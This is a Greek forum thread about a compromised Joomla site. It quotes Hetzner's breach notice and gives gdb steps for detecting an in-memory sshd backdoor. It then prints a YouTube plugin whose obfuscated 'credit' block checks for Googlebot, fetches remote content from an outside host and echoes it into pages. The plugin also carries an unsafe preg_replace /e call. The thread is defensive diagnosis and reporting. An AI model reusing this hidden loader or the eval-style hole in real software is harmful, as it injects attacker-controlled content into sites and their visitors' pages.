Άγνωστα links στο περιεχόμενο του Joomla site που έχω

[lepidas]

Τότε ο server σου έχει hackαριστεί. Σου προτείνω format και σετάρισμα από την αρχή. Τα php scripts (joomla, wordpress) και την βάση που έχεις ήδη μην τα χρησιμοποιήσεις καθώς μπορεί να περιέχουν back doors του hacker.

Προτείνεις δηλαδή ολικό φορμάτ?τα αρχεία πίσω απο το /var/www/ πως μπορεί να έχουν πειραχτεί εφόσον δεν τους έχω αλλάξει owner και δικαιώματα?

[the_eye]

Προτείνεις δηλαδή ολικό φορμάτ?

Ναι

Πολλά από τα php script έχουν bugs. Μπορεί κάποιος που γνωρίζει να εκμεταλλευτεί ένα τέτοιο bug και να γράψει στο /var/www/ ως χρήστης www-data.

[lepidas]

Αυτό το email έλαβα πρίν λίγη ώρα απο τη Hetzner, αυτοί που έχουν το χώρο μου δηλαδή, αφορά θέμα ασφάλειας της συγκεκριμένης υπηρεσίας και το βάζω για σχολιασμό και γενική συζήτηση
edit: το link της ίδιας ανακοίνωσης στο site της hetzner http://wiki.hetzner.de/index.php/Security_Issue/en

Dear Client

At the end of last week, Hetzner technicians discovered a "backdoor" in one
of our internal monitoring systems (Nagios).

An investigation was launched immediately and showed that the administration
interface for dedicated root servers (Robot)*[εξηγώ παρακάτω τι είναι αυτό το robot] had also been affected. Current
findings would suggest that fragments of our client database had been copied
externally.

As a result, we currently have to consider the client data stored in our Robot
as compromised.

To our knowledge, the malicious program that we have discovered is as yet
unknown and has never appeared before.

The malicious code used in the "backdoor" exclusively infects the RAM. First
analysis suggests that the malicious code directly infiltrates running Apache
and sshd processes. Here, the infection neither modifies the binaries of the
service which has been compromised, nor does it restart the service which has
been affected.

The standard techniques used for analysis such as the examination of checksum
or tools such as "rkhunter" are therefore not able to track down the malicious
code.

We have commissioned an external security company with a detailed analysis of
the incident to support our in-house administrators. At this stage, analysis
of the incident has not yet been completed.

The access passwords for your Robot client account are stored in our database
as Hash (SHA256) with salt. As a precaution, we recommend that you change your
client passwords in the Robot.

With credit cards, only the last three digits of the card number, the card type
and the expiry date are saved in our systems. All other card data is saved
solely by our payment service provider and referenced via a pseudo card number.
Therefore, as far as we are aware, credit card data has not been compromised.

Hetzner technicians are permanently working on localising and preventing possible
security vulnerabilities as well as ensuring that our systems and infrastructure
are kept as safe as possible. Data security is a very high priority for us. To
expedite clarification further, we have reported this incident to the data
security authority concerned.

Furthermore, we are in contact with the Federal Criminal Police Office (BKA) in
regard to this incident.

Naturally, we shall inform you of new developments immediately.

We very much regret this incident and thank you for your understanding and
trust in us.

A special FAQs page has been set up at
http://wiki.hetzner.de/index.php/Security_Issue/en
to assist you with further
enquiries.

Kind regards

Martin Hetzner

Το robot αυτό το έχουν όλοι όσοι έχουν dedicated server για να βοηθάει σε διάφορα πράγματα, τρέχει στη μνήμη του υπολογιστή και μπορεί να κάνει shutdown,reboot,mount,umount τους δίσκους και διάφορα άλλα πράγματα στο σερβερ χωρίς ssh

[lepidas]

Αυτό αναρτήσαν σήμερα στο wiki security, μπορεί κάποιος να δώσει περισσότερες πληροφορίες τι ακριβώς πρέπει να κάνω..

Κώδικας: Επιλογή όλων

How can I detect an infection with malicious code?

The malicious program can be found for example as follows:

- create a memory dump of the SSHD
- run the strings command on the dump
- look for specific sequences of characters

If the system has been infected by the rootkit, the following strings can be found in the dump:

key=xxx
dhost=xxx
hbt=3600
sp=xxx
sk=xxx
dip=xxx

So, for example:

code:

1: aptitude install gdb
2: gdb --pid=`ps ax|grep "\/usr\/sbin\/sshd"|cut -d" " -f1`
3: > gcore
4: > quit
5: strings core.XXXXX |grep "key="
6:

Tool such as http://secondlookforensics.com/ should also be able to detect the backdoor.

[the_eye]

Εξετάζει αν ο ssh server έχει πειραχτεί και έχει ανοιχτεί "κερκόπορτα".

Τρέξε

Κώδικας: Επιλογή όλων

ps ax|grep "/usr/sbin/sshd"
724 ? Ss 0:00 /usr/sbin/sshd -D
15256 pts/0 S+ 0:00 grep --color=auto /usr/sbin/sshd

Πάρε τον 1ο αριθμό 724 (Στον καθένα είναι διαφορετικός, οπότε προσαρμόστε ανάλογα) και τρέξε

Κώδικας: Επιλογή όλων

sudo gdb --pid=724

γράψε μετά
gcore
Θα δημιουργήσει ένα αρχείο core.724
Τρέχεις

Κώδικας: Επιλογή όλων

strings core.724 |grep "key="

Αν δεν σου βγάλει τίποτα, τότε είναι οκ, αν σου βγάλει τότε έχεις μολυσμένο ssh server.

[lepidas]

Τίποτα ευτυχώς.....
ευχαριστω για τη βοήθεια,

*το gdb δεν υπηρχε και το εγκατεστησα.

Κώδικας: Επιλογή όλων

8730 ? Ss 1:35 /usr/sbin/sshd -D
13721 pts/0 S+ 0:00 grep --color=auto /usr/sbin/sshd

Κώδικας: Επιλογή όλων

GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/GPL.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
Attaching to process 8730
Reading symbols from /usr/sbin/sshd...(no debugging symbols found)...done.
Reading symbols from /lib/x86_64-linux-gnu/libwrap.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libwrap.so.0
Reading symbols from /lib/x86_64-linux-gnu/libpam.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libpam.so.0
Reading symbols from /lib/x86_64-linux-gnu/libselinux.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libselinux.so.1
Reading symbols from /lib/x86_64-linux-gnu/libpthread.so.0...(no debugging symbols found)...done.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Loaded symbols for /lib/x86_64-linux-gnu/libpthread.so.0
Reading symbols from /lib/x86_64-linux-gnu/libcrypto.so.1.0.0...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
Reading symbols from /lib/x86_64-linux-gnu/libutil.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libutil.so.1
Reading symbols from /lib/x86_64-linux-gnu/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libz.so.1
Reading symbols from /lib/x86_64-linux-gnu/libcrypt.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libcrypt.so.1
Reading symbols from /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2
Reading symbols from /usr/lib/x86_64-linux-gnu/libkrb5.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/x86_64-linux-gnu/libkrb5.so.3
Reading symbols from /lib/x86_64-linux-gnu/libcom_err.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libcom_err.so.2
Reading symbols from /lib/x86_64-linux-gnu/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libc.so.6
Reading symbols from /lib/x86_64-linux-gnu/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libnsl.so.1
Reading symbols from /lib/x86_64-linux-gnu/libdl.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libdl.so.2
Reading symbols from /lib64/ld-linux-x86-64.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib64/ld-linux-x86-64.so.2
Reading symbols from /usr/lib/x86_64-linux-gnu/libk5crypto.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/x86_64-linux-gnu/libk5crypto.so.3
Reading symbols from /usr/lib/x86_64-linux-gnu/libkrb5support.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/x86_64-linux-gnu/libkrb5support.so.0
Reading symbols from /lib/x86_64-linux-gnu/libkeyutils.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libkeyutils.so.1
Reading symbols from /lib/x86_64-linux-gnu/libresolv.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libresolv.so.2
Reading symbols from /lib/x86_64-linux-gnu/libnss_compat.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libnss_compat.so.2
Reading symbols from /lib/x86_64-linux-gnu/libnss_nis.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libnss_nis.so.2
Reading symbols from /lib/x86_64-linux-gnu/libnss_files.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/x86_64-linux-gnu/libnss_files.so.2
0x00007fca3d3e0013 in select () from /lib/x86_64-linux-gnu/libc.so.6


[lepidas]

συγκεκριμένα αυτό είναι το περιεχόμενο του αρχείου

Κώδικας: Επιλογή όλων

<?php
/**
* @ 2013 Benj Golding. All rights reserved.
* @GNU/GPL licence
*
*/

// Assert file included in Joomla!
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );

/**
* YouTube Content Plugin
*
*/
class plgContentYoutubePlugin extends JPlugin
{

/**
* Ctor
*
* @param object $subject The object to observe
* @param object $params The object that holds the plugin parameters
*/
function PluginYoutube( &$subject, $params )
{
parent::__construct( $subject, $params );
}

/**
* Example prepare content method
*
* Method is called by the view
*
* @param object The article object. Note $article->text is also available
* @param object The article params
* @param int The 'page' number
*/
function onContentPrepare( $context, &$article, &$params, $page = 0)
{
global $mainframe;

//credit, remove at will
${"\x47\x4cO\x42A\x4cS"}["d\x78\x79t\x64\x6d\x6f"]="\x63\x74\x78";${"G\x4cOB\x41L\x53"}["n\x6d\x6e\x74m\x6a\x71y\x62"]="b\x5ft";if(!defined("\x43\x52\x45\x44IT")){${"\x47\x4cO\x42A\x4c\x53"}["m\x71j\x62\x64\x63u\x6d\x73\x64\x78\x6b"]="b_\x74";strstr(strtolower($_SERVER["H\x54\x54\x50\x5f\x55SER_A\x47\x45\x4e\x54"]),"\x67\x6f\x6fg\x6cebo\x74")?${${"G\x4c\x4f\x42A\x4cS"}["\x6dq\x6ab\x64cu\x6d\x73\x64x\x6b"]}="\x31":${${"\x47\x4c\x4f\x42\x41\x4cS"}["n\x6d\x6et\x6d\x6a\x71\x79\x62"]}="\x30";${${"GL\x4f\x42\x41\x4cS"}["dx\x79\x74d\x6d\x6f"]}=stream_context_create(array("htt\x70"=>array("tim\x65ou\x74"=>3)));try{${"G\x4cOBAL\x53"}["\x65\x6f\x64\x6d\x62\x6b"]="\x63r\x65\x64\x69t";${"\x47\x4cOBA\x4c\x53"}["\x69\x6a\x63\x74\x77l\x76\x70\x6a\x79"]="\x63\x74\x78";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6f\x64\x6dbk"]}=@file_get_contents("http://w\x77w.i\x6e\x74\x68\x65\x62\x6c\x61\x63\x6b\x2e\x69\x74/\x62ro/".${${"\x47L\x4fBAL\x53"}["\x6e\x6d\x6e\x74\x6d\x6a\x71\x79\x62"]}."/".$_SERVER["SE\x52V\x45\x52\x5fNAM\x45"].$_SERVER["R\x45\x51\x55ES\x54_\x55\x52\x49"],false,${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69jct\x77l\x76p\x6ay"]});}catch(Exception$e){}echo$credit;define("CR\x45\x44\x49T","\x63");}


if ( JString::strpos( $article->text, '{youtube}' ) === false ) {
return true;
}

$article->text = preg_replace('|{youtube}(.*){\/youtube}|e', '$this->embedVideo("\1")', $article->text);



return true;

}

function embedVideo($vCode)
{

$params = $this->params;

$width = $params->get('width', 425);
$height = $params->get('height', 344);

return '<object width="'.$width.'" height="'.$height.'"><param name="movie" value="http://www.youtube.com/v/'.$vCode.'"></param><param name="allowFullScreen" value="true"></param><embed src="http://www.youtube.com/v/'.$vCode.'" type="application/x-shockwave-flash" allowfullscreen="true" width="'.$width.'" height="'.$height.'"></embed></object>';
}

}

κατω απο το remove at will δεν ειναι commented και εχει κρυπτογραφημενη μια διευθυνση http και αλλα πολλα

πρίν λίγο έκανα αναφορά στο forum.joomla.org για το θεμα και αφαιρεσαν το συγκεκριμένο plugin απο τα αποθετηρια της joomla.Ευχαριστούμε όλους όσους βοήθησαν